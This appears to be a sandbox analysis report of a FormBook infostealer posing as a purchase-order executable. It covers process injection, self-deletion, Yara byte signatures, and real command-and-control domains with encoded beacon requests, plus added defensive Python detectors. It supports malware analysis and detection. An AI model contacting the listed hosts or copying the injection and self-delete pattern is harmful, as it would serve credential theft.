
Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name: Purchase Order 40,7045$.exe
Analysis ID: 321097
MD5: 4142c1713da2f4f94bec71bfed46587b
SHA1: 06cc7bd53758a0936f4b674847411a4f912fd654
SHA256: fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
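
The tree above is the usual FormBook shape: the sample starts a second copy of its own image (the instance that gets hollowed), that copy injects into explorer.exe, explorer.exe is then seen launching a 32-bit system utility (ipconfig.exe) from SysWOW64, and the utility runs cmd.exe to delete the original file. The following Python is an added example, not Joe Sandbox code, that rebuilds this tree from process-creation events and flags the two habits: a process re-launching its own image, and a cmd.exe "/c del" whose target is the image of one of its own ancestors. EVENTS is constructed from the Startup list; the first instance's parent PID (0 here) and the full paths of explorer.exe and cmd.exe are assumptions, since the report does not print them. Real process-creation telemetry also will not show explorer.exe as a child of the sample (the report draws it there because it was injected into), so in an EDR the link between the two halves of the tree has to come from injection events, not from parent PIDs.

```python
"""Process-tree checks for the FormBook self-launch / self-delete pattern (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\user\Desktop\Purchase Order 40,7045$.exe"


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's Startup tree. Parent PID of 5468 and the full
# image paths of explorer.exe and cmd.exe are assumptions.
EVENTS: List[Proc] = [
    Proc(5468, 0, SAMPLE, f"'{SAMPLE}'"),
    Proc(4392, 5468, SAMPLE, SAMPLE),                          # second copy of the same image
    Proc(3292, 4392, r"C:\Windows\explorer.exe", ""),          # drawn under 4392 because it was injected into
    Proc(6420, 3292, r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe"),
    Proc(6524, 6420, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),
    Proc(6540, 6524, r"C:\Windows\system32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# 'del' target, quoted with ' or " or bare, up to end of the command line.
DEL_TARGET = re.compile(r"""\bdel\s+(['"]?)(.+?)\1\s*$""", re.IGNORECASE)


def by_pid(events: List[Proc]) -> Dict[int, Proc]:
    return {p.pid: p for p in events}


def ancestors(events: List[Proc], pid: int) -> List[Proc]:
    """Parent chain of `pid`, nearest first; stops at an unknown PID or a cycle."""
    table = by_pid(events)
    chain, seen = [], {pid}
    cur = table.get(pid)
    while cur is not None and cur.ppid in table and cur.ppid not in seen:
        cur = table[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def find_self_spawn(events: List[Proc]) -> List[Tuple[int, int]]:
    """(parent_pid, child_pid) where a process starts a second copy of its own image."""
    table = by_pid(events)
    return [(p.ppid, p.pid) for p in events
            if p.ppid in table and table[p.ppid].image.lower() == p.image.lower()]


def find_self_delete(events: List[Proc]) -> List[dict]:
    """cmd.exe '/c del <file>' where <file> is the image of an ancestor process."""
    table = by_pid(events)
    findings = []
    for p in events:
        if not p.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_TARGET.search(p.cmdline)
        if not m:
            continue
        target = m.group(2)
        for anc in ancestors(events, p.pid):
            if anc.image.lower() == target.lower():
                launcher = table[p.ppid]
                findings.append({
                    "cmd_pid": p.pid,
                    "launcher_pid": p.ppid,
                    # ipconfig.exe here: a signed system binary used as the deleting parent
                    "launcher_is_system_utility": launcher.image.lower().startswith(SYSTEM_DIRS),
                    "origin_pid": anc.pid,
                    "deleted": target,
                })
                break
    return findings


if __name__ == "__main__":
    print("self-spawn pairs:", find_self_spawn(EVENTS))
    for f in find_self_delete(EVENTS):
        print("self-delete:", f)
    print("chain from conhost:", [p.image for p in ancestors(EVENTS, 6540)])
```

The self-delete check deliberately correlates the deleted path with an ancestor's image rather than matching "del" alone, since cmd.exe deleting arbitrary files is common; a process arranging the deletion of its own original binary through a system utility is not.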

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      (13 entries in total; the remainder are not shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16089:$sqlite3step: 68 34 1C 7B E1
        • 0x1619c:$sqlite3step: 68 34 1C 7B E1
        • 0x160b8:$sqlite3text: 68 38 2A 90 C5
        • 0x161dd:$sqlite3text: 68 38 2A 90 C5
        • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          (7 entries in total; the remainder are not shown here)
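
Two things in the Yara Overview are worth checking by hand. First, the JPCERT/CC strings are all five-byte `push imm32` encodings (opcode 68), so each one is the code pushing a 32-bit constant that the rule names after sqlite3_step, sqlite3_column_text and sqlite3_column_blob; the report does not say how those constants were derived from the API names, so nothing below claims a hash function. Second, the offsets printed for the `.unpack` build of dump 0.2 (0x75d8, 0x7972, 0x13285, ...) sit exactly 0xE00 below the `.raw.unpack` offsets for every string, which is what you expect when the same code is re-laid out into a rebuilt PE rather than a different match. The following Python is an added example, not Joe Sandbox code and not the full text of either rule (the real rules have further strings and a condition): it scans a constructed, zero-filled image in which the printed byte sequences have been written at the printed raw offsets, decodes the push immediates, and verifies the uniform offset shift.

```python
"""Re-check the Yara Overview byte strings and offsets (added example, not the rules themselves)."""
import struct
from typing import Dict, List

# Strings exactly as printed for rule Formbook_1 (yara-signator).
FORMBOOK_1: Dict[str, str] = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# Strings exactly as printed for the JPCERT/CC rule: each is 'push imm32'.
JPCERT_FORMBOOK: Dict[str, str] = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
# Offsets printed for 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack.
RAW_OFFSETS: Dict[str, List[int]] = {
    "$sequence_0": [0x83D8, 0x8772], "$sequence_1": [0x14085], "$sequence_2": [0x13B71],
    "$sequence_3": [0x14187], "$sequence_4": [0x142FF], "$sequence_5": [0x917A],
    "$sequence_6": [0x12DEC], "$sequence_7": [0x9EF2], "$sequence_8": [0x19167],
    "$sequence_9": [0x1A1DA],
    "$sqlite3step": [0x16089, 0x1619C], "$sqlite3text": [0x160B8, 0x161DD],
    "$sqlite3blob": [0x160CB, 0x161F3],
}
# Offsets printed for the rebuilt PE (.unpack) of the same dump.
UNPACK_OFFSETS: Dict[str, List[int]] = {
    "$sequence_0": [0x75D8, 0x7972], "$sequence_1": [0x13285], "$sequence_2": [0x12D71],
    "$sequence_3": [0x13387], "$sequence_4": [0x134FF], "$sequence_5": [0x837A],
    "$sequence_6": [0x11FEC], "$sequence_7": [0x90F2], "$sequence_8": [0x18367],
    "$sequence_9": [0x193DA],
}


def scan(image: bytes, patterns: Dict[str, str]) -> Dict[str, List[int]]:
    """Return {name: [offsets]} for every occurrence of each hex pattern in image."""
    hits: Dict[str, List[int]] = {}
    for name, hexstr in patterns.items():
        needle = bytes.fromhex(hexstr)
        offsets, pos = [], image.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = image.find(needle, pos + 1)   # overlapping hits are fine for a re-check
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(hexstr: str) -> int:
    """Decode a 5-byte 'push imm32' (opcode 0x68) pattern to the little-endian immediate."""
    raw = bytes.fromhex(hexstr)
    if len(raw) != 5 or raw[0] != 0x68:
        raise ValueError("not a push imm32 encoding: " + hexstr)
    return struct.unpack("<I", raw[1:])[0]


def offset_delta(raw: Dict[str, List[int]], unpack: Dict[str, List[int]]) -> int:
    """The single raw-minus-unpack shift shared by all strings; raises if it is not uniform."""
    deltas = {r - u for name in unpack for r, u in zip(raw[name], unpack[name])}
    if len(deltas) != 1:
        raise ValueError(f"offsets do not shift uniformly: {sorted(deltas)}")
    return deltas.pop()


def build_image(size: int = 0x1B000) -> bytes:
    """Constructed image: zero-filled, with each pattern written at its reported raw offset."""
    buf = bytearray(size)
    for name, hexstr in {**FORMBOOK_1, **JPCERT_FORMBOOK}.items():
        needle = bytes.fromhex(hexstr)
        for off in RAW_OFFSETS[name]:
            buf[off:off + len(needle)] = needle
    return bytes(buf)


if __name__ == "__main__":
    image = build_image()
    for rule, pats in (("Formbook_1", FORMBOOK_1), ("JPCERT Formbook", JPCERT_FORMBOOK)):
        hits = scan(image, pats)
        print(f"{rule}: {len(hits)}/{len(pats)} strings present")
        for name, offs in hits.items():
            print("  ", name, [hex(o) for o in offs])
    for name, hexstr in JPCERT_FORMBOOK.items():
        print(f"{name}: push 0x{push_imm32(hexstr):08X}")
    print("raw -> .unpack shift:", hex(offset_delta(RAW_OFFSETS, UNPACK_OFFSETS)))
```

To run the same check against a real dump, replace `build_image()` with the file's bytes; the 0xE00 check only makes sense between two layouts of the same dump, not across different processes.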

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Purchase Order 40,7045$.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: Purchase Order 40,7045$.exe | Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe | ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase Order 40,7045$.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1 | Host: www.maninhatphoto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1 | Host: www.placeduconfort.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1 | Host: www.heartandcrowncloset.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1 | Host: www.fahufu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1 | Host: www.the-gongs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.shopnicknaks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1 | Host: www.sweetbasilmarketing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1 | Host: www.justsoldbykristen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1 | Host: www.ariasu-nakanokaikei.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1 | Host: www.realitytvstockwatch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.searchnehomes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1 | Host: www.happinestbuilders.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1 | Host: www.hemparcade.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | IP Address: 185.201.11.126
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: DEDIPATH-LLCUS
Source: Joe Sandbox View | ASN Name: AS-HOSTINGERLT
Source: unknown | DNS traffic detected: queries for: www.handsfreedocs.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 20 Nov 2020 10:07:21 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | String found in binary or memory: http://www.hemparcade.com
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | String found in binary or memory: http://www.hemparcade.com/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
